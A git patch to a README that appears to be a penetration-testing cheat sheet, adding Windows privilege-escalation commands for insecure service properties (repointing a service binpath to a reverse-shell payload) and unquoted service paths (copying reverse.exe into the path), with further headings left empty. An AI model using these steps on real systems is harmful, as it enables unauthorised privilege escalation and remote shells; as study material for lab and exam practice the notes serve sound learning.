From 08434c7734c5fddb632c14b27a8bdaa3b39b1288 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Fri, 2 Sep 2022 20:37:08 -0400
Subject: [PATCH] Update README.md

---
 README.md | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)

diff --git a/README.md b/README.md
index 4279e8a..bfbe6ee 100644
--- a/README.md
+++ b/README.md
@@ -691,6 +691,45 @@ sc.exe config {NAME} {OPTION}= {VALUE}
 Start/Stop a service:
 net start {NAME}
 net stop {NAME}
+
+# 1. Insecure Service Properties
+
+
+# Verify permissions of a service using accesschk
+.\accesschk.exe /accepteula -uwcqv user {SERVICE}
+
+# Query the configuration of a service:
+sc.exe qc {SERVICE}
+
+# Query the current state of a service:
+sc.exe query {SERVICE}
+
+# Configure binary path payload reverse shell
+config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\""
+
+# Start a service:
+net start {SERVICE}
+
+
+# 2. Unquoted Service Path
+
+# Verify permissions of to start service using accesschk
+.\accesschk.exe /accepteula -uwcqv user {SERVICE}
+
+# Verify permissions of to write using accesschk
+.\accesschk.exe /accepteula -uwcqv {BINARY PATH: ex. "C:\Program Files\Unquoted Path Service\"}
+
+# Copy payload to unquoted service path break point
+copy reverse.exe {BINARY PATH: ex. "C:\Program Files\Unquoted Path Service\Common.exe"}
+
+# Start a service:
+net start {SERVICE}
+
+# 3. Weak Registry Permissions
+
+# 4. Insecure Service Executables
+
+# 5. DLL Hijacking
 ```